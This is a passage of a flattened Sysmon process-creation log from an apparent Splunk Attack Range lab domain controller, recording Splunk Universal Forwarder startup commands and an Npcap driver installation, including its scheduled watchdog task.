AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-43A3-6078-5005-00000000AE01}6880C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 154100x800000000000000021453Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:11.344{A8622C2F-43A3-6078-5005-00000000AE01}6880C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-43A1-6078-4305-00000000AE01}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x800000000000000021444Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:11.043{A8622C2F-43A3-6078-4F05-00000000AE01}7064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-43A3-6078-4E05-00000000AE01}4924C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list replication_port --no-log 154100x800000000000000021436Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:11.036{A8622C2F-43A3-6078-4E05-00000000AE01}4924C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-43A3-6078-4D05-00000000AE01}3692C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-log 154100x800000000000000021428Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:11.030{A8622C2F-43A3-6078-4D05-00000000AE01}3692C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-43A1-6078-4305-00000000AE01}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x800000000000000021417Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:10.676{A8622C2F-43A2-6078-4C05-00000000AE01}6780C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd" check-transforms-keysC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-43A1-6078-4305-00000000AE01}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x800000000000000021408Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:10.351{A8622C2F-43A2-6078-4B05-00000000AE01}4936C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-43A2-6078-4A05-00000000AE01}6592C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warnings 154100x800000000000000021400Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:10.345{A8622C2F-43A2-6078-4A05-00000000AE01}6592C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-43A1-6078-4305-00000000AE01}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x800000000000000021391Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:10.031{A8622C2F-43A2-6078-4905-00000000AE01}6640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-43A2-6078-4805-00000000AE01}3828C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warnings 154100x800000000000000021383Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:10.024{A8622C2F-43A2-6078-4805-00000000AE01}3828C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-43A1-6078-4305-00000000AE01}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x800000000000000021374Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:09.668{A8622C2F-43A1-6078-4705-00000000AE01}6344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-43A1-6078-4605-00000000AE01}6480C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-log 154100x800000000000000021366Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:09.662{A8622C2F-43A1-6078-4605-00000000AE01}6480C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-43A1-6078-4305-00000000AE01}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x800000000000000021356Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:09.350{A8622C2F-43A1-6078-4505-00000000AE01}6160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" check-licenseC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-43A1-6078-4305-00000000AE01}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x800000000000000021347Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:09.045{A8622C2F-43A1-6078-4405-00000000AE01}6836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" generate-sslC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-43A1-6078-4305-00000000AE01}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x800000000000000021339Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:09.033{A8622C2F-43A1-6078-4305-00000000AE01}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{A8622C2F-43A1-6078-4205-00000000AE01}6384C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1 154100x800000000000000021331Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:09.027{A8622C2F-43A1-6078-4205-00000000AE01}6384C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021321Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:08.689{A8622C2F-43A0-6078-4105-00000000AE01}2248C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-43A0-6078-4005-00000000AE01}6552C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list kvstore --no-log 154100x800000000000000021313Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:08.683{A8622C2F-43A0-6078-4005-00000000AE01}6552C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-43A0-6078-3F05-00000000AE01}6596C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-log 154100x800000000000000021305Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:08.678{A8622C2F-43A0-6078-3F05-00000000AE01}6596C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-43A0-6078-3805-00000000AE01}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 154100x800000000000000021296Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:08.374{A8622C2F-43A0-6078-3E05-00000000AE01}7108C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-43A0-6078-3D05-00000000AE01}4184C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 154100x800000000000000021288Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:08.368{A8622C2F-43A0-6078-3D05-00000000AE01}4184C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-43A0-6078-3C05-00000000AE01}716C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 154100x800000000000000021280Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:08.362{A8622C2F-43A0-6078-3C05-00000000AE01}716C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-43A0-6078-3805-00000000AE01}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 154100x800000000000000021271Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:08.057{A8622C2F-43A0-6078-3B05-00000000AE01}6544C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-43A0-6078-3A05-00000000AE01}6660C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool web list settings --no-log 154100x800000000000000021263Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:08.050{A8622C2F-43A0-6078-3A05-00000000AE01}6660C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-43A0-6078-3905-00000000AE01}5188C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool web list settings --no-log 154100x800000000000000021255Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:08.045{A8622C2F-43A0-6078-3905-00000000AE01}5188C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-43A0-6078-3805-00000000AE01}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 154100x800000000000000021247Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:08.033{A8622C2F-43A0-6078-3805-00000000AE01}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{A8622C2F-43A0-6078-3705-00000000AE01}2708C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 154100x800000000000000021239Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:08.027{A8622C2F-43A0-6078-3705-00000000AE01}2708C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021228Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:07.988{A8622C2F-439F-6078-3505-00000000AE01}3312C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{A8622C2F-439F-6078-3305-00000000AE01}6308C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvars 154100x800000000000000021219Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:07.961{A8622C2F-439F-6078-3305-00000000AE01}6308C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021212Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:07.264{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" serviceC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x800000000000000018839Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:45.793{A8622C2F-4389-6078-2D05-00000000AE01}7132C:\Windows\SysWOW64\schtasks.exe10.0.14393.0 (rs1_release.160715-1616)Task Scheduler Configuration ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationsctasks.exeSCHTASKS.EXE /Create /F /RU SYSTEM /SC ONSTART /TN npcapwatchdog /TR "'C:\Program Files\Npcap\CheckStatus.bat'" /NPC:\Program Files\Npcap\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=4B95F8D55CD14BD3D38BF24A521D3577,SHA256=CAA9AF113C1682AD8A6644342B37D96AA544F1AF712D446BD29EF9F12BA30CA0,IMPHASH=BEF0464378C9F8D07E6BF56FFE61864B{A8622C2F-4380-6078-2105-00000000AE01}4776C:\Temp\npcap.exe"C:\temp\npcap.exe" 154100x800000000000000018760Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:41.327{A8622C2F-4385-6078-2C05-00000000AE01}4496C:\Windows\System32\drvinst.exe10.0.14393.0 (rs1_release.160715-1616)Driver Installation ModuleMicrosoft® Windows® Operating SystemMicrosoft CorporationDrvInst.EXEDrvInst.exe "4" "0" "C:\Users\ADMINI~1\AppData\Local\Temp\{c089f090-c098-3a4a-b7d0-27e680df9e7f}\NPCAP.inf" "9" "405306be3" "0000000000000B0C" "WinSta0\Default" "0000000000000B20" "208" "C:\Program Files\Npcap"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=188CE3916E9FD3D123F38F01F8F8B93C,SHA256=C196086017725E8724DAB1DFDFABA9F4B7CFACD47A885BCC81984F8BC78D9F75,IMPHASH=35385286B2F23FB279C3D2868A503474{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x800000000000000018745Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:41.156{A8622C2F-4385-6078-2A05-00000000AE01}6492C:\Program Files\Npcap\NPFInstall.exe1.20A LWF & WFP driver installation toolNpcapInsecure.Com LLC.NPFInstall.exe"C:\Program Files\Npcap\NPFInstall.exe" -n -iC:\Windows\system32\Npcap\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69A87CA4D06087A36AF2C26CFAC3E705,SHA256=94DBF270AE479A2AE2F61F7B2C573BC7D6CB787F264B9178654A3AF2A66244CA,IMPHASH=596D8DB0DE29AE6D4AACEFE8943C3DD2{A8622C2F-4380-6078-2105-00000000AE01}4776C:\Temp\npcap.exe"C:\temp\npcap.exe" 154100x800000000000000018730Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:41.047{A8622C2F-4385-6078-2805-00000000AE01}4528C:\Program Files\Npcap\NPFInstall.exe1.20A LWF & WFP 